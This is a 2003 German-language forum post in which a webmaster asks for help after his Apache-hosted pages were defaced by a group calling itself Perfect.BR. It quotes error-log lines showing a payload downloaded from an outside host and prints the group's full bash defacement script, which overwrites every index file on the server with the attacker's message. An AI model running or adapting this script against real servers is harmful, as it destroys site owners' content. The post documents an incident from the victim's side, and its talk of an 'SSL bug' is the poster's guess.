HAcker Bitte um Hilfe
Posted: 2003-11-05 18:09
Sorry hab erst in Scripting gepostet mein Fehler zu spät gesehen.
Auf allen Seiten die auf dem Server liegen hab ich diese NAchricht:
Perfect.BR TEAM perfectbr@mail.com
Habe den FTP geprüft. Es wurde von allen index Daten ein Backup gemacht jedoch wnen ich sie wiederherstelle ist die File direkt wieder da. Scheinbar ein SSL Bug. Kennt das jamand un kann mir helfen ?
Habe eigentlich immer alles eingespielt !
Irgendwie hat er dieser URL ausgeführt es scheint ein Wurm zu sein Norton erkennt die File so wenn ich sie versuche zu laden:
http://www.fdlsk8.hpg.com.br/sslpbr ( Link nicht auf Linux ausführen )
Auszug aus dem Error.log Apache:
Was sollte ich nun tun ?
Jemand eine Idee ?
Bitte um Hilfe
Das hier habe ich gefunden:
Es muss irgendwo am Apache liegen denn ich kann ändern was ich will gibt es beim Apache eine Art Stadard seite die immer kommt ?
Auf allen Seiten die auf dem Server liegen hab ich diese NAchricht:
Perfect.BR TEAM perfectbr@mail.com
Habe den FTP geprüft. Es wurde von allen index Daten ein Backup gemacht jedoch wnen ich sie wiederherstelle ist die File direkt wieder da. Scheinbar ein SSL Bug. Kennt das jamand un kann mir helfen ?
Habe eigentlich immer alles eingespielt !
Irgendwie hat er dieser URL ausgeführt es scheint ein Wurm zu sein Norton erkennt die File so wenn ich sie versuche zu laden:
http://www.fdlsk8.hpg.com.br/sslpbr ( Link nicht auf Linux ausführen )
Auszug aus dem Error.log Apache:
Code: Select all
[Wed Nov 5 17:02:19 2003] [error] [client 12.148.209.196] File does not exist: /home/www/web30/html/robots.txt
--17:27:24-- http://www.uias.hpg.ig.com.br/utils/cbd
=> `cbd'
Connecting to www.uias.hpg.ig.com.br:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 15,003 [text/plain]
0K -> .......... .... [100%]
17:27:30 (30.33 KB/s) - `cbd' saved [15003/15003]
--17:30:25-- http://www.uias.hpg.ig.com.br/utils/cbd
=> `cbd.1'
Connecting to www.uias.hpg.ig.com.br:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 15,003 [text/plain]
0K -> .......... .... [100%]
17:30:26 (30.52 KB/s) - `cbd.1' saved [15003/15003]
Was sollte ich nun tun ?
Jemand eine Idee ?
Bitte um Hilfe
Das hier habe ich gefunden:
Code: Select all
#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# ##
# Perfect.BR - e-mail: perfectbr@mail.com ##
# ##
##########################################################
# # # Quem Somos: # # # # # # # # # # # # # # # # ###
# Sl4yD :: Wroger :: Gui_ :: Merfolk ##
##########################################################
procura_paginas () {
find $DIR_LOG -name *index* >.logs
#find $DIR_LOG -name *wtmp* >>.logs
LINHA=`wc .logs |cut -c-7`
}
console () {
#echo -n "[S] Killando qualquer especie de monitoramento..."
#killall -9 tail 1>/dev/null 2>/dev/null;echo "ok"
echo -n "==> Aguarde, procurando paginas.."
procura_paginas;
echo "encontrados $LINHA Paginas para Ownar"
sleep 5
echo -n "--> Colocando seu texto nas Paginas"
for log in `cat .logs`
do
echo -n " -> in $log..."
cp $log $log.bak
echo $MY_TEXT >$log
echo "ok"
done
echo ":-) Perfect.BR ownou vc."
echo "ok"
echo "((((( Agora é soh registra! )))))"
}
help () {
echo " Use: $0 <seu_texto>"
echo "Exemplo: $0 'Owned Perfect.BR'"
}
if [ `whoami` != "root" ]; then
echo "[S] Execute somente como root"
exit
fi
if [ "$2" = "" ]; then
DIR_LOG="./"
else
DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<< Perfect.BR Devastador de Server >>>>>>>>>>"
echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo " www.perfectbr.kit.net "
echo "e-mail: perfectbr@mail.com irc.brasnet.org #perfect_br"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
help;
else
MY_TEXT="$1"
console;
fi
Es muss irgendwo am Apache liegen denn ich kann ändern was ich will gibt es beim Apache eine Art Stadard seite die immer kommt ?